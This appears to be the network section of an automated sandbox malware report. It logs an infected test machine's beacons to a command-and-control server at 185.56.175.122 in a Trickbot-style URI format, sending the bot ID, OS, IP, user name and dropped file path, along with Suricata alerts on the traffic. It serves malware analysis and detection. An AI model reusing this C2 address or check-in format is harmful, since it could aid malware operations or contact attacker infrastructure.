Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
wtfismyip.com | 51.79.249.161 | |
GET 200 https://185.56.175.122/rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/5/file/
Request:
GET /rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/5/file/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.78.0
Host: 185.56.175.122
Response:
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Fri, 10 Sep 2021 08:19:16 GMT
Content-Type: application/octet-stream
Content-Length: 224
Connection: keep-alive
GET 200 https://185.56.175.122/rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/3r3r57PfZRZnF5NBVnVbZZp15X9911N/
Request:
GET /rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/3r3r57PfZRZnF5NBVnVbZZp15X9911N/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.78.0
Host: 185.56.175.122
Response:
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Fri, 10 Sep 2021 08:19:17 GMT
Content-Type: text/plain
Content-Length: 735
Connection: keep-alive
GET 200 https://185.56.175.122/rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/14/exc/E:%200xc0000005%20A:%200x0000000077919A5A/0/
Request:
GET /rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/14/exc/E:%200xc0000005%20A:%200x0000000077919A5A/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.78.0
Host: 185.56.175.122
Response:
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Fri, 10 Sep 2021 08:19:18 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET 200 https://185.56.175.122/rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/14/user/test22/0/
Request:
GET /rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/14/user/test22/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.78.0
Host: 185.56.175.122
Response:
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Fri, 10 Sep 2021 08:19:18 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET 200 https://185.56.175.122/rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/14/path/C:%5CUsers%5Ctest22%5CAppData%5CRoaming%5CAnyLiteGamesYX5S%5Creadytunes.exe/0/
Request:
GET /rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/14/path/C:%5CUsers%5Ctest22%5CAppData%5CRoaming%5CAnyLiteGamesYX5S%5Creadytunes.exe/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.78.0
Host: 185.56.175.122
Response:
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Fri, 10 Sep 2021 08:19:18 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET 200 https://185.56.175.122/rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/14/NAT%20status/client%20is%20behind%20NAT/0/
Request:
GET /rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/14/NAT%20status/client%20is%20behind%20NAT/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.78.0
Host: 185.56.175.122
Response:
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Fri, 10 Sep 2021 08:19:19 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET 200 http://wtfismyip.com/text
Request:
GET /text HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.78.0
Host: wtfismyip.com
Response:
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET
Access-Control-Allow-Origin: *
Content-Type: text/plain
Date: Fri, 10 Sep 2021 08:19:17 GMT
Content-Length: 16
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.102:49168 -> 185.56.175.122:443 | 2028401 | ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex | Unknown Traffic |
TCP 192.168.56.102:49169 -> 51.79.249.161:80 | 2019737 | ET POLICY IP Check wtfismyip.com | Potential Corporate Privacy Violation |
TCP 185.56.175.122:443 -> 192.168.56.102:49168 | 2011540 | ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) | Not Suspicious Traffic |
TCP 192.168.56.102:49169 -> 51.79.249.161:80 | 2013028 | ET POLICY curl User-Agent Outbound | Attempted Information Leak |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.102:49168 -> 185.56.175.122:443 | C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | 50:fd:fd:4e:2c:57:ea:f7:c9:cd:3f:61:4a:a2:40:01:1b:b8:df:02 |
Snort Alerts
No Snort Alerts